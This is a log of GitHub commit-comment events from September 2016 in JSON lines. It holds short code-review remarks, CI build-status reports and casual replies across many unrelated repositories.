{"id":"4531512060","type":"CommitCommentEvent","actor":{"login":"saisaokh"},"repo":{"name":"adithyanarayanan/pager"},"payload":{"comment":{"id":18939000,"position":null,"line":null,"path":null,"commit_id":"1851449d2271a246861ac943db485a9034388ed2","created_at":"2016-09-08T02:53:46Z","updated_at":"2016-09-08T02:53:46Z","body":"testing comment"}},"created_at":"2016-09-08T02:53:46Z"}
{"id":"4531514217","type":"CommitCommentEvent","actor":{"login":"lemonlatte"},"repo":{"name":"lemonlatte/goradar-api"},"payload":{"comment":{"id":18939002,"position":35,"line":35,"path":"main.go","commit_id":"82236dd9e43cc025246e9f2f3291e4334d95705b","created_at":"2016-09-08T02:54:32Z","updated_at":"2016-09-08T02:54:32Z","body":"No. You need to reserve engineer on the apps. :)"}},"created_at":"2016-09-08T02:54:32Z"}
{"id":"4531517285","type":"CommitCommentEvent","actor":{"login":"wangyinlong9527"},"repo":{"name":"wangyinlong9527/learngit"},"payload":{"comment":{"id":18939008,"position":1,"line":1,"path":"test.txt","commit_id":"d6b030a5bab7b0a37d96620dc1ceee0229dce88a","created_at":"2016-09-08T02:55:45Z","updated_at":"2016-09-08T02:55:45Z","body":"aaa"}},"created_at":"2016-09-08T02:55:45Z"}
{"id":"4531517722","type":"CommitCommentEvent","actor":{"login":"pradyumnad"},"repo":{"name":"rfcx/web-components"},"payload":{"comment":{"id":18939009,"position":null,"line":null,"path":null,"commit_id":"dea96861c99934116a790e5dd9fd63af9fb6c88f","created_at":"2016-09-08T02:55:54Z","updated_at":"2016-09-08T02:55:54Z","body":"Did we miss listing karma on bower.json?"}},"created_at":"2016-09-08T02:55:54Z"}
{"id":"4531523380","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18939015,"position":null,"line":null,"path":null,"commit_id":"39d26be21f1f398b638069bf97cdbfbf5222e296","created_at":"2016-09-08T02:58:01Z","updated_at":"2016-09-08T02:58:01Z","body":"os_2_0_develop (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-39d26be21f1f398b638069bf97cdbfbf5222e296-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-39d26be21f1f398b638069bf97cdbfbf5222e296-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-08T02:58:01Z"}
{"id":"4531524032","type":"CommitCommentEvent","actor":{"login":"rl-kanda1225"},"repo":{"name":"rl-kanda1225/slack_robot"},"payload":{"comment":{"id":18939018,"position":3,"line":3,"path":"README.md","commit_id":"6572a7e70ed923e35ff973dacad320b2989fe2fe","created_at":"2016-09-08T02:58:17Z","updated_at":"2016-09-08T02:58:17Z","body":"If you want to wacth what does it work,you can watch this video\r\nhttps://www.youtube.com/watch?v=5PC0VCh68AI"}},"created_at":"2016-09-08T02:58:17Z"}
{"id":"4531524204","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18939019,"position":null,"line":null,"path":null,"commit_id":"94f7a1033dc591525ca6e85a2fb02b11d4d12323","created_at":"2016-09-08T02:58:21Z","updated_at":"2016-09-08T02:58:21Z","body":"128792325-Issue5803 (wfbuhl) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1754 of 1758 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-94f7a1033dc591525ca6e85a2fb02b11d4d12323-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-94f7a1033dc591525ca6e85a2fb02b11d4d12323-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.77%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-94f7a1033dc591525ca6e85a2fb02b11d4d12323-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.46%25-green.svg)</a>\n"}},"created_at":"2016-09-08T02:58:21Z"}
{"id":"4531525517","type":"CommitCommentEvent","actor":{"login":"badfrogg"},"repo":{"name":"badfrogg/PlaneFlight"},"payload":{"comment":{"id":18939022,"position":null,"line":null,"path":null,"commit_id":"83c0567a34e63f0cf60e78567c7ce71b6ef9ce59","created_at":"2016-09-08T02:58:52Z","updated_at":"2016-09-08T02:58:52Z","body":"Haha!"}},"created_at":"2016-09-08T02:58:52Z"}
{"id":"4531526532","type":"CommitCommentEvent","actor":{"login":"naufalizee"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":18939024,"position":null,"line":null,"path":null,"commit_id":"d2180cb45a36b701389c6ac3bb95082dae221058","created_at":"2016-09-08T02:59:17Z","updated_at":"2016-09-08T02:59:17Z","body":"got a bug in new update \r\nand can you give me link for learning this program ?\r\nstill new in program but i wanna learn "}},"created_at":"2016-09-08T02:59:17Z"}
{"id":"4531527309","type":"CommitCommentEvent","actor":{"login":"CovertJaguar"},"repo":{"name":"CovertJaguar/Railcraft"},"payload":{"comment":{"id":18939026,"position":16,"line":45,"path":"src/main/java/mods/railcraft/common/items/ItemTie.java","commit_id":"d4daba9907e218c9d3c4a89564c6466eaf022800","created_at":"2016-09-08T02:59:33Z","updated_at":"2016-09-08T02:59:33Z","body":"Because they don't mix concrete with milk? What's so weird about that?"}},"created_at":"2016-09-08T02:59:33Z"}
{"id":"4536301182","type":"CommitCommentEvent","actor":{"login":"mehdisadeghi"},"repo":{"name":"simphony/simphony-lammps"},"payload":{"comment":{"id":18951812,"position":309,"line":176,"path":"examples/simple_nve/simple_nve.py","commit_id":"354d9c28f2cf1f7fdcc34dd0946bccf9959e034e","created_at":"2016-09-08T20:00:12Z","updated_at":"2016-09-08T20:00:12Z","body":"`Lennard_Jones_6_12` does not have a `materials` property. So far it is called `material`."}},"created_at":"2016-09-08T20:00:12Z"}
{"id":"4536301489","type":"CommitCommentEvent","actor":{"login":"m1foley"},"repo":{"name":"polleverywhere/FOMObot-hipchat"},"payload":{"comment":{"id":18951813,"position":null,"line":null,"path":null,"commit_id":"a592d930ddc3e47f6782c7d1149be436620601fb","created_at":"2016-09-08T20:00:15Z","updated_at":"2016-09-08T20:00:15Z","body":"@tghaas This is a public repo. Is this appropriate to be in source control?"}},"created_at":"2016-09-08T20:00:15Z"}
{"id":"4536307165","type":"CommitCommentEvent","actor":{"login":"briancoley"},"repo":{"name":"briancoley/3M-"},"payload":{"comment":{"id":18951819,"position":null,"line":null,"path":null,"commit_id":"7461d634b33a44036469f2294b0150fe8d6730b8","created_at":"2016-09-08T20:01:13Z","updated_at":"2016-09-08T20:01:13Z","body":"Testing mobile app."}},"created_at":"2016-09-08T20:01:13Z"}
{"id":"4536307300","type":"CommitCommentEvent","actor":{"login":"mehdisadeghi"},"repo":{"name":"simphony/simphony-lammps"},"payload":{"comment":{"id":18951820,"position":318,"line":185,"path":"examples/simple_nve/simple_nve.py","commit_id":"354d9c28f2cf1f7fdcc34dd0946bccf9959e034e","created_at":"2016-09-08T20:01:15Z","updated_at":"2016-09-08T20:01:15Z","body":"`NoseHoover` is undefined."}},"created_at":"2016-09-08T20:01:15Z"}
{"id":"4536315171","type":"CommitCommentEvent","actor":{"login":"NattyE"},"repo":{"name":"NattyE/nlstimedist"},"payload":{"comment":{"id":18951838,"position":null,"line":null,"path":null,"commit_id":"f0545543492cd96d2a326b3b2bfaa175e1f60405","created_at":"2016-09-08T20:02:40Z","updated_at":"2016-09-08T20:02:40Z","body":"Fixes #11 "}},"created_at":"2016-09-08T20:02:40Z"}
{"id":"4536316324","type":"CommitCommentEvent","actor":{"login":"dmlundeby"},"repo":{"name":"BandAidCrew/Ham-Crate"},"payload":{"comment":{"id":18951843,"position":null,"line":null,"path":null,"commit_id":"2d861d1ae1e20bd5a65bd6d18e01bc2e326d5327","created_at":"2016-09-08T20:02:53Z","updated_at":"2016-09-08T20:02:53Z","body":"Hehe, nice :)"}},"created_at":"2016-09-08T20:02:53Z"}
{"id":"4536316841","type":"CommitCommentEvent","actor":{"login":"Goles"},"repo":{"name":"Goles/mopub-ios-sdk"},"payload":{"comment":{"id":18951845,"position":null,"line":null,"path":null,"commit_id":"75cb8ba9a0881094696e069e8d05864d42aa64de","created_at":"2016-09-08T20:02:59Z","updated_at":"2016-09-08T20:02:59Z","body":"Hey @al-s, I see what you're saying. So just to be clear, your suggestion would be, in this case, to remove the vungleSDKAdAyableChanged to prevent this sort of race from happening correct?"}},"created_at":"2016-09-08T20:02:59Z"}
{"id":"4536317303","type":"CommitCommentEvent","actor":{"login":"abdulsamad786"},"repo":{"name":"zaincbs/PYTECH"},"payload":{"comment":{"id":18951848,"position":11,"line":11,"path":"cat.py","commit_id":"2142206ce13259d3156cc17f0f42f42f79d5704d","created_at":"2016-09-08T20:03:05Z","updated_at":"2016-09-08T20:03:05Z","body":"Done !\n\nOn Thu, Sep 8, 2016 at 12:56 PM, abdulsamad abdulrab <\nabdulsamadabdulrab@gmail.com> wrote:\n\n> if I return v , program does not show anything during execution\n>\n> On Thu, Sep 8, 2016 at 12:52 PM, abdulsamad abdulrab <\n> abdulsamadabdulrab@gmail.com> wrote:\n>\n>> sorry let me do it\n>>\n>> On Thu, Sep 8, 2016 at 12:50 PM, abdulsamad abdulrab <\n>> abdulsamadabdulrab@gmail.com> wrote:\n>>\n>>> I am not printing any v here\n>>>\n>>> On Thu, Sep 8, 2016 at 12:31 PM, zaincbs <notifications@github.com>\n>>> wrote:\n>>>\n>>>> Return v and print it in the main.\n>>>>\n>>>> —\n>>>> You are receiving this because you authored the thread.\n>>>> Reply to this email directly, view it on GitHub\n>>>> <https://github.com/zaincbs/PYTECH/commit/2142206ce13259d3156cc17f0f42f42f79d5704d#commitcomment-18951378>,\n>>>> or mute the thread\n>>>> <https://github.com/notifications/unsubscribe-auth/AK4cPqxOri6yFSRxvKV9El7HiwsBDn19ks5qoGKfgaJpZM4J4XRL>\n>>>> .\n>>>>\n>>>\n>>>\n>>\n>\n"}},"created_at":"2016-09-08T20:03:05Z"}
{"id":"4536318211","type":"CommitCommentEvent","actor":{"login":"nmbo2l"},"repo":{"name":"NMSU-DGD/DeActivition"},"payload":{"comment":{"id":18951849,"position":1,"line":1,"path":"team.txt","commit_id":"6f3081b7ba4040313d970d6ef2644210f7a4cc07","created_at":"2016-09-08T20:03:16Z","updated_at":"2016-09-08T20:03:16Z","body":"hi"}},"created_at":"2016-09-08T20:03:16Z"}
{"id":"4536321176","type":"CommitCommentEvent","actor":{"login":"refractionpcsx2"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":18951853,"position":null,"line":null,"path":null,"commit_id":"f9d8cb97c08e71d47b415321633f7232b8a9e790","created_at":"2016-09-08T20:03:50Z","updated_at":"2016-09-08T20:03:50Z","body":"Woohoo! \\o/"}},"created_at":"2016-09-08T20:03:50Z"}
{"id":"4536325407","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/chorus"},"payload":{"comment":{"id":18951873,"position":null,"line":null,"path":null,"commit_id":"d475f2bf8839ccbb75f187127965b976a88563e9","created_at":"2016-09-08T20:04:39Z","updated_at":"2016-09-08T20:04:39Z","body":"TeamCity Chorus :: chorus-win32-master Continuous [Build 2.6.265.d475f2bf8839ccbb75f187127965b976a88563e9](http://build.palaso.org/viewLog.html?buildId=76695&buildTypeId=bt2) outcome was **SUCCESS**\nSummary: Tests passed: 949, ignored: 50 Build time: 00:28:12"}},"created_at":"2016-09-08T20:04:39Z"}
{"id":"4536331622","type":"CommitCommentEvent","actor":{"login":"brian-rickman"},"repo":{"name":"Teradata/presto"},"payload":{"comment":{"id":18951897,"position":91,"line":91,"path":"presto-product-tests/src/main/java/com/facebook/presto/tests/jdbc/LdapTests.java","commit_id":"9eeba7e72715793aa41a1de88a84559ed034b83b","created_at":"2016-09-08T20:05:51Z","updated_at":"2016-09-08T20:05:51Z","body":"Not yet.  I am sure it is using the correct config file, because changes to other properties are applied.  Not sure what else to look at."}},"created_at":"2016-09-08T20:05:51Z"}
{"id":"4536332952","type":"CommitCommentEvent","actor":{"login":"okitec"},"repo":{"name":"leletec/NameMemo"},"payload":{"comment":{"id":18951904,"position":null,"line":null,"path":null,"commit_id":"c8fd7929afea57c4daa7c526c76b6e17cf3b22ae","created_at":"2016-09-08T20:06:07Z","updated_at":"2016-09-08T20:06:07Z","body":"What Holy Purge I missed here *shakes head*"}},"created_at":"2016-09-08T20:06:07Z"}
{"id":"4536338608","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18951920,"position":null,"line":null,"path":null,"commit_id":"4856531eeb3fc373f9ea9bbb4bb95c3406182d90","created_at":"2016-09-08T20:07:12Z","updated_at":"2016-09-08T20:07:12Z","body":"radiance_measure_2.0 (rpg777) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-4856531eeb3fc373f9ea9bbb4bb95c3406182d90-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-4856531eeb3fc373f9ea9bbb4bb95c3406182d90-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-08T20:07:12Z"}
{"id":"4536346802","type":"CommitCommentEvent","actor":{"login":"HybridDog"},"repo":{"name":"minetest/minetest"},"payload":{"comment":{"id":18951940,"position":54,"line":1141,"path":"src/content_mapblock.cpp","commit_id":"e58a55aa82dfc66325a694dcc3519d3c0f3388a6","created_at":"2016-09-08T20:08:44Z","updated_at":"2016-09-08T20:08:44Z","body":"thanks"}},"created_at":"2016-09-08T20:08:44Z"}
{"id":"4536348339","type":"CommitCommentEvent","actor":{"login":"lightningterror"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":18951945,"position":null,"line":null,"path":null,"commit_id":"f9d8cb97c08e71d47b415321633f7232b8a9e790","created_at":"2016-09-08T20:09:02Z","updated_at":"2016-09-08T20:09:02Z","body":"Wasn't separate shader object fixed with 16.7.3 ?"}},"created_at":"2016-09-08T20:09:02Z"}
{"id":"4536352082","type":"CommitCommentEvent","actor":{"login":"karamatf"},"repo":{"name":"kangecha/mlm_system"},"payload":{"comment":{"id":18951952,"position":null,"line":null,"path":null,"commit_id":"6f5abf76a243be763a4b9ebfafd84b5964d2adaf","created_at":"2016-09-08T20:09:45Z","updated_at":"2016-09-08T20:09:45Z","body":"Please provide the password for the database"}},"created_at":"2016-09-08T20:09:45Z"}
{"id":"4536353249","type":"CommitCommentEvent","actor":{"login":"refractionpcsx2"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":18951960,"position":null,"line":null,"path":null,"commit_id":"f9d8cb97c08e71d47b415321633f7232b8a9e790","created_at":"2016-09-08T20:09:58Z","updated_at":"2016-09-08T20:09:58Z","body":"it was fixed a little while ago, but this has only just been merged."}},"created_at":"2016-09-08T20:09:58Z"}
{"id":"4536354719","type":"CommitCommentEvent","actor":{"login":"b1conrad"},"repo":{"name":"Picolab/node-pico-engine"},"payload":{"comment":{"id":18951964,"position":null,"line":null,"path":null,"commit_id":"a1b4f2c865c938c205aa62f587c71a28dc7ddc12","created_at":"2016-09-08T20:10:17Z","updated_at":"2016-09-08T20:10:17Z","body":"with an entirely new semi-automated bootstrap, these screenshots are no longer needed "}},"created_at":"2016-09-08T20:10:17Z"}
{"id":"4536361554","type":"CommitCommentEvent","actor":{"login":"ajpires"},"repo":{"name":"OpenDataRepository/data-publisher"},"payload":{"comment":{"id":18951988,"position":null,"line":null,"path":null,"commit_id":"43beae4a89a4fbdf3bf069b814e1c33ef29c7af2","created_at":"2016-09-08T20:11:32Z","updated_at":"2016-09-08T20:11:32Z","body":"Going to need to run two sql queries..first one to set public status of datafield equal to public status of theme_element, then another to set all remaining datafields with a public date of \"0000-00-00 00:00:00\" to non-public."}},"created_at":"2016-09-08T20:11:32Z"}
{"id":"4536363026","type":"CommitCommentEvent","actor":{"login":"nickbradley"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18951995,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T20:11:50Z","updated_at":"2016-09-08T20:11:50Z","body":"@CPSC310Bot "}},"created_at":"2016-09-08T20:11:50Z"}
{"id":"4536363125","type":"CommitCommentEvent","actor":{"login":"diicar"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":18951993,"position":5,"line":735,"path":"modules/@angular/forms/src/model.ts","commit_id":"7b240284373c2918461c4843b7f281b716b39ef9","created_at":"2016-09-08T20:11:50Z","updated_at":"2016-09-08T20:11:50Z","body":"Maybe swap like this :     \r\nreturn this.disabled || Object.keys(this.controls).length > 0 ;\r\nSame thing at line 914"}},"created_at":"2016-09-08T20:11:50Z"}
{"id":"4536365172","type":"CommitCommentEvent","actor":{"login":"johanbove"},"repo":{"name":"wesbos/es6-articles"},"payload":{"comment":{"id":18952009,"position":null,"line":null,"path":null,"commit_id":"10abf63a60b9b61b03df87b7f21469a16d267a1a","created_at":"2016-09-08T20:12:15Z","updated_at":"2016-09-08T20:12:15Z","body":"☝️ 📏 😉 "}},"created_at":"2016-09-08T20:12:15Z"}
{"id":"4536367511","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18952019,"position":null,"line":null,"path":null,"commit_id":"4856531eeb3fc373f9ea9bbb4bb95c3406182d90","created_at":"2016-09-08T20:12:41Z","updated_at":"2016-09-08T20:12:41Z","body":"radiance_measure_2.0 (rpg777) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-4856531eeb3fc373f9ea9bbb4bb95c3406182d90-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-08T20:12:41Z"}
{"id":"4536369590","type":"CommitCommentEvent","actor":{"login":"petterroea"},"repo":{"name":"tumblr/policy"},"payload":{"comment":{"id":18952027,"position":null,"line":null,"path":null,"commit_id":"10a83db20735bd930f6dc2a6ab4dca4299b800bf","created_at":"2016-09-08T20:13:06Z","updated_at":"2016-09-08T20:13:06Z","body":"\\o/ that's one way of earning more money, i guess"}},"created_at":"2016-09-08T20:13:06Z"}
{"id":"4536370870","type":"CommitCommentEvent","actor":{"login":"brian-rickman"},"repo":{"name":"Teradata/presto"},"payload":{"comment":{"id":18952032,"position":112,"line":112,"path":"presto-product-tests/src/main/java/com/facebook/presto/tests/jdbc/LdapTests.java","commit_id":"9eeba7e72715793aa41a1de88a84559ed034b83b","created_at":"2016-09-08T20:13:20Z","updated_at":"2016-09-08T20:13:20Z","body":"Having looked at that file, I think the right answer is to put all the LDAP tests in the `profile_specific_tests` group."}},"created_at":"2016-09-08T20:13:20Z"}
{"id":"4536371090","type":"CommitCommentEvent","actor":{"login":"IAmNotHanni"},"repo":{"name":"inexor-game/code"},"payload":{"comment":{"id":18952033,"position":71,"line":74,"path":"inexor/flowgraph/if/fl_if_condition.cpp","commit_id":"c78e0db46e91a926005fc3eb4da7184bed11c7a8","created_at":"2016-09-08T20:13:23Z","updated_at":"2016-09-08T20:13:23Z","body":"CMemBoolNode inherits from CScriptNode. Is it a good idea to cast it this way?"}},"created_at":"2016-09-08T20:13:23Z"}
{"id":"4536373250","type":"CommitCommentEvent","actor":{"login":"TheOfficialFloW"},"repo":{"name":"TheOfficialFloW/VitaShell"},"payload":{"comment":{"id":18952044,"position":null,"line":null,"path":null,"commit_id":"2b79149cdc2b2bdecb971d35b70d547910faef72","created_at":"2016-09-08T20:13:48Z","updated_at":"2016-09-08T20:13:48Z","body":"Cutting the last string and pasting it at the end again results in corrupted data on top of the text file."}},"created_at":"2016-09-08T20:13:48Z"}
{"id":"4536377692","type":"CommitCommentEvent","actor":{"login":"nickbradley"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18952068,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T20:14:40Z","updated_at":"2016-09-08T20:14:40Z","body":"@CPSC310Bot "}},"created_at":"2016-09-08T20:14:40Z"}
{"id":"4536377895","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18952069,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T20:14:42Z","updated_at":"2016-09-08T20:14:42Z","body":"Request cannot be processed. Rate limit exceeded; please wait 43074293ms before trying again."}},"created_at":"2016-09-08T20:14:42Z"}
{"id":"4536378000","type":"CommitCommentEvent","actor":{"login":"jaymzh"},"repo":{"name":"chef/knife-ec-backup"},"payload":{"comment":{"id":18952070,"position":null,"line":null,"path":null,"commit_id":"9b2705792d0ff9cc6ab587e69f42d8fb99d43681","created_at":"2016-09-08T20:14:43Z","updated_at":"2016-09-08T20:14:43Z","body":"This broke restore for us :("}},"created_at":"2016-09-08T20:14:43Z"}
{"id":"4536381192","type":"CommitCommentEvent","actor":{"login":"nickbradley"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18952085,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T20:15:19Z","updated_at":"2016-09-08T20:15:19Z","body":"@CPSC310Bot "}},"created_at":"2016-09-08T20:15:19Z"}
{"id":"4536381265","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18952088,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T20:15:20Z","updated_at":"2016-09-08T20:15:20Z","body":"Request received; should be processed within 2 minutes.\nNote: No/Invalid deliverable specified, using latest."}},"created_at":"2016-09-08T20:15:20Z"}
{"id":"4536381899","type":"CommitCommentEvent","actor":{"login":"mjtko"},"repo":{"name":"alces-software/clusterware"},"payload":{"comment":{"id":18952089,"position":null,"line":null,"path":null,"commit_id":"f814965f5202e6e463e3bd77bb10c3720f0973f8","created_at":"2016-09-08T20:15:26Z","updated_at":"2016-09-08T20:15:26Z","body":"I think it might be easier to use `base64 -w0` (to disable wrapping) rather than pipe through `xargs` and `tr`.  Would that fix the problem equally well?"}},"created_at":"2016-09-08T20:15:26Z"}
{"id":"4536385114","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18952096,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T20:16:01Z","updated_at":"2016-09-08T20:16:01Z","body":"6 passing, 3 failing\nName of first failing test: Echo Service Should be able to echo "}},"created_at":"2016-09-08T20:16:01Z"}
{"id":"4536385470","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18952098,"position":3,"line":null,"path":"src/Parsers/Csv.php","commit_id":"b9dc8bb9229a0e33e8a39180fc471f9d8b872d5b","created_at":"2016-09-08T20:16:06Z","updated_at":"2016-09-08T20:16:06Z","body":"\n      Avoid variables with short names like $v. Configured minimum length is 3.\n    "}},"created_at":"2016-09-08T20:16:06Z"}
{"id":"4536391383","type":"CommitCommentEvent","actor":{"login":"nickbradley"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18952117,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T20:17:10Z","updated_at":"2016-09-08T20:17:10Z","body":"@CPSC310Bot #d1"}},"created_at":"2016-09-08T20:17:10Z"}
{"id":"4536391456","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18952118,"position":3,"line":null,"path":"src/Parsers/Csv.php","commit_id":"4657babe827f2ac25fd31ec8eeaa0de56717e7ed","created_at":"2016-09-08T20:17:11Z","updated_at":"2016-09-08T20:17:11Z","body":"\n      Avoid variables with short names like $v. Configured minimum length is 3.\n    "}},"created_at":"2016-09-08T20:17:11Z"}
{"id":"4536391460","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18952119,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T20:17:11Z","updated_at":"2016-09-08T20:17:11Z","body":"Request received; should be processed within 2 minutes."}},"created_at":"2016-09-08T20:17:11Z"}
{"id":"4536395017","type":"CommitCommentEvent","actor":{"login":"BenDaviesGFX"},"repo":{"name":"BenDaviesGFX/Chaos"},"payload":{"comment":{"id":18952130,"position":null,"line":null,"path":null,"commit_id":"250ba2a2179e1b80f956f0aad1a4ff2edc1ebf3c","created_at":"2016-09-08T20:17:48Z","updated_at":"2016-09-08T20:17:48Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;y9HTdV0g&#x2F;7-fill-rect-is-not-filling-the-whole-canvas-01\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Fill rect is not filling the whole Canvas 01</a>"}},"created_at":"2016-09-08T20:17:48Z"}
{"id":"4536395374","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/chorus"},"payload":{"comment":{"id":18952131,"position":null,"line":null,"path":null,"commit_id":"d475f2bf8839ccbb75f187127965b976a88563e9","created_at":"2016-09-08T20:17:52Z","updated_at":"2016-09-08T20:17:52Z","body":"TeamCity Chorus :: chorus-precise64-master Continuous [Build 2.6.666.d475f2bf8839ccbb75f187127965b976a88563e9](http://build.palaso.org/viewLog.html?buildId=76704&buildTypeId=bt323) outcome was **SUCCESS**\nSummary: Tests passed: 937, ignored: 56 Build time: 00:18:28"}},"created_at":"2016-09-08T20:17:52Z"}
{"id":"4536395377","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18952132,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T20:17:52Z","updated_at":"2016-09-08T20:17:52Z","body":"6 passing, 3 failing\nName of first failing test: Echo Service Should be able to echo "}},"created_at":"2016-09-08T20:17:52Z"}
{"id":"4536396621","type":"CommitCommentEvent","actor":{"login":"BigBoot"},"repo":{"name":"TheOfficialFloW/VitaShell"},"payload":{"comment":{"id":18952140,"position":null,"line":null,"path":null,"commit_id":"2b79149cdc2b2bdecb971d35b70d547910faef72","created_at":"2016-09-08T20:18:08Z","updated_at":"2016-09-08T20:18:08Z","body":"Hmm can't reproduce here"}},"created_at":"2016-09-08T20:18:08Z"}
{"id":"4536397364","type":"CommitCommentEvent","actor":{"login":"BenDaviesGFX"},"repo":{"name":"BenDaviesGFX/Chaos"},"payload":{"comment":{"id":18952144,"position":null,"line":null,"path":null,"commit_id":"2a2f43b7cba6a3af02247e321851afb380ebf188","created_at":"2016-09-08T20:18:16Z","updated_at":"2016-09-08T20:18:16Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;UA3r1X6Y&#x2F;6-add-game-state-manager\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Add Game State Manager</a>"}},"created_at":"2016-09-08T20:18:16Z"}
{"id":"4536397787","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"cyberium/mangos-tbc"},"payload":{"comment":{"id":18952147,"position":4,"line":104,"path":"src/game/PetHandler.cpp","commit_id":"fb3108b7722c2d21bea97ea492f1102866c813ae","created_at":"2016-09-08T20:18:20Z","updated_at":"2016-09-08T20:18:20Z","body":"you don't need to remove this, this works fine on wrath; https://github.com/cmangos/mangos-wotlk/blob/master/src/game/PetHandler.cpp#L172\r\n\r\ndon't you rather need to pull in these commits?\r\n\r\nhttps://github.com/cmangos/mangos-wotlk/commit/c6af39184f23cf0502c1c8ab26446aa79f30f9af\r\n\r\nhttps://github.com/cmangos/mangos-wotlk/commit/5b231bee8151d34ac3452712176a22c82996e64f\r\n\r\n?\r\n\r\nI would be really really sad to lose this check for pets."}},"created_at":"2016-09-08T20:18:20Z"}
